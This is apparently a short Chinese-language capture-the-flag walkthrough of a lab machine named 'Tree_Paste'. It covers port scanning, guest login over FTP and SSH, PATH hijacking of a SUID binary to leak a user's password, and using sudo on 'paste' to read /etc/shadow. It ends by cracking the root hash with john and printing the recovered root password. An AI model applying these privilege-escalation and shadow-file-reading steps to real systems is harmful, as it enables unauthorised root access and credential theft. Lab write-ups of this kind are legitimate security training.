20250713_Tree_Paste

target:192.168.1.61

打点

nmap 扫描 21,22,80 端口

ftp $ip

└─# ftp 192.168.1.61
Connected to 192.168.1.61.
220 220 Welcome to FTP Service Please use guest:guest to login
Name (192.168.1.61:kali): 

提示 guest 登录后，ftp 内无内容

ssh 连接 guest 用户，成功登录

提权

查看 suid 文件

有一个 change 文件，运行后报找不到 chpasswd 路径的错误

在自己主目录下写一个 chpasswd

# chpasswd
/bin/bash

然后将自己的目录添加到环境变量里
export PATH=$PATH:(echo ~)
再次执行，看到 change 报错出 film 密码

其实这里的 chpasswd 可能更应该写其他内容，不过这里过了就行

拿到 film，sudo -l 查看到特权命令 paste

这个 paste 是一个简单的文本处理工具，主要用于合并文件内容

直接读取 /etc/shadow

sudo paste /etc/shadow /dev/null # 尝试读取 shadow 文件

最后爆破一下 root 密码

john hash

得到

root:sexybitch!

切换 root ，提权成功